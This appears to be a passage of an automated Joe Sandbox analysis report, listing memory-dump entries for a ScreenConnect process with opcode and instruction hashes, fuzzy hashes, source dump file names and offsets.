                                                                                                                                                                                                                                                  • Opcode ID: 105d3656cb7bec273658782527ff0b8d5a4ebde562784ab70c186251b14d8365
                                                                                                                                                                                                                                                  • Instruction ID: 25522230a6e1a336ba8a4b28cb1914568880b4c8e3e68528c61e7e261cbe06cd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 105d3656cb7bec273658782527ff0b8d5a4ebde562784ab70c186251b14d8365
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D316F32B001068BDB149F69C458AAFFBF5EF89798F14846AE909E7754DB31DC018B90
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 5cd6b67b12401327aa6af7b57f332eb46f0474ed1407f301f9a1af737a57428f
                                                                                                                                                                                                                                                  • Instruction ID: 9e6e947d7917220d3741acd4c056e0b6351d22b5e1079c21944513620ed96b0b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5cd6b67b12401327aa6af7b57f332eb46f0474ed1407f301f9a1af737a57428f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B431E470B041859FC745DB6CC8509AEBFB6FF86740B1480B6D948DB396DA319D05C791
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 5a4e92926d2fc1ccaf463313dcf9668099ce6c895a9618ac248ef9c514233846
                                                                                                                                                                                                                                                  • Instruction ID: f0703316b96d02a6bff9b3bcc8eb7f30c45e6ac093c5058a44e634740c9dd762
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5a4e92926d2fc1ccaf463313dcf9668099ce6c895a9618ac248ef9c514233846
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB310930600605CFC770CF29D88496AB7F2AF89725B144A18D856DB7A5E730F945CBA1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: bf96fec466297b7a7460537e46c1fc41621e661a19c7f890a372c8e77ee6eec2
                                                                                                                                                                                                                                                  • Instruction ID: 5cd4bd7c36945da5198d10e4a1386e338cd82a221048f153df8e81f535a66caf
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bf96fec466297b7a7460537e46c1fc41621e661a19c7f890a372c8e77ee6eec2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B331A032A0010EDFCF04CFA8D9409CDBBB6FF89704F1484A5E905BB264DB35690ACB90
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: f27a107acfdaf173dd115e58cc4892914f49664e99d141521c15555f05349d8c
                                                                                                                                                                                                                                                  • Instruction ID: fed7b15421b99702b4e44734b0fa55eeaec4d4cce5866ee01ca6f230eddfa73c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f27a107acfdaf173dd115e58cc4892914f49664e99d141521c15555f05349d8c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED113471B093959FC7164B78D81506ABFB4EF8A6143168AEBC484CF353DA719C49C7D0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 7b5d5ecd1ae804007102721f6897c97a34fe1522a57868ce0219faaf915164c7
                                                                                                                                                                                                                                                  • Instruction ID: d4f629f77781e40c4444294e2c42161bd26605bf9dc9a418f9b5d0e83bdb3aa7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b5d5ecd1ae804007102721f6897c97a34fe1522a57868ce0219faaf915164c7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD2133305006059FCB38CF26D948A56BBF5EF84714B008B2DD593976A5EB31E989CF90
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 5d5d51b37c0a61a998bf5aa1fd23f5e1b0b795503a322412ccf001b12fd4ee0a
                                                                                                                                                                                                                                                  • Instruction ID: 7844ad992266c2b78b31cb19133d3d0d93ccc6b350871e1d8886626c7de8caa0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d5d51b37c0a61a998bf5aa1fd23f5e1b0b795503a322412ccf001b12fd4ee0a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51112E3590024A9FCB01DFA8D9409DEBFB1EF4A314B14819AE945BF261D7316A1ACB90
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 3db53338e08c83d466fa0fd7f6fc5c6743ac5fa44a134d5e165f4d1ecdd77adc
                                                                                                                                                                                                                                                  • Instruction ID: b2f4b1c73d2409d9d868bfac059cac76a6e9ed31d57b946ce5a0d4fe1a319db6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3db53338e08c83d466fa0fd7f6fc5c6743ac5fa44a134d5e165f4d1ecdd77adc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE11E370E00284AFDB11CF68D8009EEBFB6AFC5720F0884AAD984D7165D771A902CBA0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 87667cffbabb83a4bd7947e0c0ff1672d7f78031bbc7d09164da306eeacd5151
                                                                                                                                                                                                                                                  • Instruction ID: 4a20f36cb7153e6698f984d926ec0a3641df7d3b27b171e5dc5827a7f2e79c9c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 87667cffbabb83a4bd7947e0c0ff1672d7f78031bbc7d09164da306eeacd5151
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8911A170F00249AFDB54CE6DD800EABBBBAEFC4720F18C465E904D7264E771A901CBA0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 265bfac2ae2d80b7432f4b67dd0a33d5e2647286381297b6690533110e4c808f
                                                                                                                                                                                                                                                  • Instruction ID: b004bd80f999e4ddb50d53bb1f0d811c5c4168b14b967b0edb8d4782a0d96b95
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 265bfac2ae2d80b7432f4b67dd0a33d5e2647286381297b6690533110e4c808f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 00115B3154004EDFCB10DFA8D5848ECBFB2FF80718B58C494E805AB529D771E98ACBA0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: d69594259cda12b78228f4a7ddcd7da29e559722f840e37e685af97065c5d6fc
                                                                                                                                                                                                                                                  • Instruction ID: 4592e985b74f1954068e735998b20897711aa672c68a7b3a8bbb593e5d8e4cc1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d69594259cda12b78228f4a7ddcd7da29e559722f840e37e685af97065c5d6fc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B8111235A0010A9FCF01DFA8D9409DEBBF5FF49314B108569E909BB265D771AA0ACB90
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133295385.000000000121D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0121D000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_121d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 53733d01f2c445e6adad818e857629b24473ea82258d4095c4d4dae45760f930
                                                                                                                                                                                                                                                  • Instruction ID: cd8d8a5f750ea5b7e9537a26cb9ee3557c74fce6556594f36971b00a998047d8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 53733d01f2c445e6adad818e857629b24473ea82258d4095c4d4dae45760f930
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9601F731418348DAE710CA6DC9C8767BFD8EF513A4F08C469EE480B18AC2799841C6B1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: b1740346ea33aa661e6d593811e1846b7faa13d2d50372903795815af226a1ec
                                                                                                                                                                                                                                                  • Instruction ID: 31ee94e891fe4239f3868697429c328732df4b28cee9eb1b51742f24d1c23335
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b1740346ea33aa661e6d593811e1846b7faa13d2d50372903795815af226a1ec
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B801263220D3408FC3A4CF39A400686BFE1EF9A700F0588AFE4C5C7280DA31A889C751
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 2e7c32c2771267dd34355da3d12c898e020900df959daa496b14330d8da56c49
                                                                                                                                                                                                                                                  • Instruction ID: c56ebb9dc3242fafe3447945a0dc23f48586695de7be682974cf6709b0e3736b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e7c32c2771267dd34355da3d12c898e020900df959daa496b14330d8da56c49
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0EF08C37B0C2046FD728CABEA501A9BBBEECBC4220B14C47FE54DC3780E931A5418768
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 16504461958617b74baf5093b392b504ade972e71dda6465ea101a7a0dfc345b
                                                                                                                                                                                                                                                  • Instruction ID: 0d6c61a561ac0c4368a0f007b901867991a03e4284983f135f4fe84e7dfa0449
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 16504461958617b74baf5093b392b504ade972e71dda6465ea101a7a0dfc345b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46F059353003545FC757AFBDA814AAE3FE5DFC665030841BED895CB319DA21E80E9780
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133295385.000000000121D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0121D000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_121d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: fa11011f3903fa1ace105ea41b5e6c910657024f419e4f18581330480576c21e
                                                                                                                                                                                                                                                  • Instruction ID: f4ea04a63e86c41d643800353df1b6ac4c69fbeba9cdfa4bba6e45127355b286
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fa11011f3903fa1ace105ea41b5e6c910657024f419e4f18581330480576c21e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D5F06271405344AEE7118A1AC8C8B63FFE8EB55764F18C55AEE484F28AC2799845CAB1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 24229033fa14bc9d6df5b37aebf2e4bd4f3b5177744a4ef86e04f6814d53e866
                                                                                                                                                                                                                                                  • Instruction ID: a4b383369f6e81a85f07fb269bb09968dccba7e98ee495805d6c82f8d1d2dda9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 24229033fa14bc9d6df5b37aebf2e4bd4f3b5177744a4ef86e04f6814d53e866
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F0F05C32B01481CFC741462CA8548557FF64F4A62872D82F1FC54CF282EB10DC5A8350
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 2cc28fdcd85885c9c8f6625ff7f5d711bdb98a9a4e9a364a0ad651efb5415431
                                                                                                                                                                                                                                                  • Instruction ID: 371e4ac50f213465c8383b3f51cd06799a687e42c6cadcf07dfcda426fea9948
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2cc28fdcd85885c9c8f6625ff7f5d711bdb98a9a4e9a364a0ad651efb5415431
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3AF02B7044C7D58FC7029F38A858485BFF0AE0B22071586EEC4E5CB192D234984BD751
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: ba65ca948e80543a623a6c634f00a23ea2dddece2fe7ddf2bffcc7832a00d736
                                                                                                                                                                                                                                                  • Instruction ID: 90abdbccd5be6f73323aa5c02db03167b846c229434803dc479f47b593bb4707
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ba65ca948e80543a623a6c634f00a23ea2dddece2fe7ddf2bffcc7832a00d736
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2AF0247240C7914FD312CB28E810798BFE1EEA222430946DAD4818F6AAD655FA49D351
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: eb1f7cef1c52e46799443045f0a39eb6dea3a98f2a09371eac3ca03ea3a8f854
                                                                                                                                                                                                                                                  • Instruction ID: 3f7aef50db740ff103dc384a2c38d94e4482905deceebde416ebe2883f8c6cde
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eb1f7cef1c52e46799443045f0a39eb6dea3a98f2a09371eac3ca03ea3a8f854
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0CF0A7352043449BC3615F79F41C42D7FB6EFCA23531486AAE542C7395CE705C55C750
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 5eff7a284a9c54ac501fd922918b2fa5357fd23b4f67f7713fd2dd4d412c53af
                                                                                                                                                                                                                                                  • Instruction ID: c5ea1b9c57eb31e9e2b9957d05b4543c18ae89128e1f9d2daf24aac41124a815
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5eff7a284a9c54ac501fd922918b2fa5357fd23b4f67f7713fd2dd4d412c53af
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48F05C763006104FC357EB2CB00069D7BA1DFC0AE4315456EDC5ACB209CA219C4B87C0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: dae1a9e4965448b59a2a4d8673ec1a9d23fb8950bfd2e8dccc66364af2eaa42e
                                                                                                                                                                                                                                                  • Instruction ID: 060ba70f8d348cf6f95cff6f3713559796ac9d31a87ab6dabff847c0ea6ad862
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dae1a9e4965448b59a2a4d8673ec1a9d23fb8950bfd2e8dccc66364af2eaa42e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A3F02070919248FFCB02CFB8E8405AC7FF4EB16204B0400E9D884CB256C6309A4AE311
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 75025bc7c48463134c141ee3346395a35e9f1580ead8d9fc1ddd082b52dd4190
                                                                                                                                                                                                                                                  • Instruction ID: bd75c10cf6c21acd0f8ff21e3e4876423f59267c257327cbb66e2c7b551c94f1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 75025bc7c48463134c141ee3346395a35e9f1580ead8d9fc1ddd082b52dd4190
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5F065353007249BC756EB6EE410A5E77E6EBC5AA1354812DD81AC7708DF35E8059BD0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 6323a13291e26bacdf3f18181a8f3f8cb93d3dbe99701cee375310d17d37a08e
                                                                                                                                                                                                                                                  • Instruction ID: c72371e250d914606883a68234784c967ad4eb2731f3f542ce7c0cec358cde95
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6323a13291e26bacdf3f18181a8f3f8cb93d3dbe99701cee375310d17d37a08e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D0E09231744354A787145BAE649852E7FEAFFC9A35394487DE609C7350CE628C168351
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 51e0322587cc46d8a8fd9055fe0023e62626fa461fd8e7445e2fb7fcb718d68c
                                                                                                                                                                                                                                                  • Instruction ID: 1b24b0ac4970f0a22b2ee2570b3e57ee5679a3a510a7c5807ab9b942bc23af55
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 51e0322587cc46d8a8fd9055fe0023e62626fa461fd8e7445e2fb7fcb718d68c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 14E0DF32A082042BC718CABA9901A9BBBEECBC5220B04C4BEE54DC3240E830A5018368
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: f8dab8c7c497a7d2b64fe36a7b87535c93407f5654aeb3acd1d38fc6b973e0ba
                                                                                                                                                                                                                                                  • Instruction ID: f828080c769c26157e9f81a4bdc235663489d71c8631b0c738f358b902006017
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f8dab8c7c497a7d2b64fe36a7b87535c93407f5654aeb3acd1d38fc6b973e0ba
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0CE04F31744314A787146EAFB48852EBADAFBC8A75794483DE60AC3340DE618C1943A5
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: f17c075450149e28f5dd9628876d3392b38fb7ec8aced06564f24cfea5db3e06
                                                                                                                                                                                                                                                  • Instruction ID: b2a2c1f27acc7e39345586a0f25d4eea0a8c01f2dcbb518676d0bfa7f96f7ef4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f17c075450149e28f5dd9628876d3392b38fb7ec8aced06564f24cfea5db3e06
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 74E0C27AF882149FC7211FA9B8810E9BFF9DE8626931849BBD549C7611C231892B87C0
                                                                                                                                                                                                                                                  Memory Dump Source
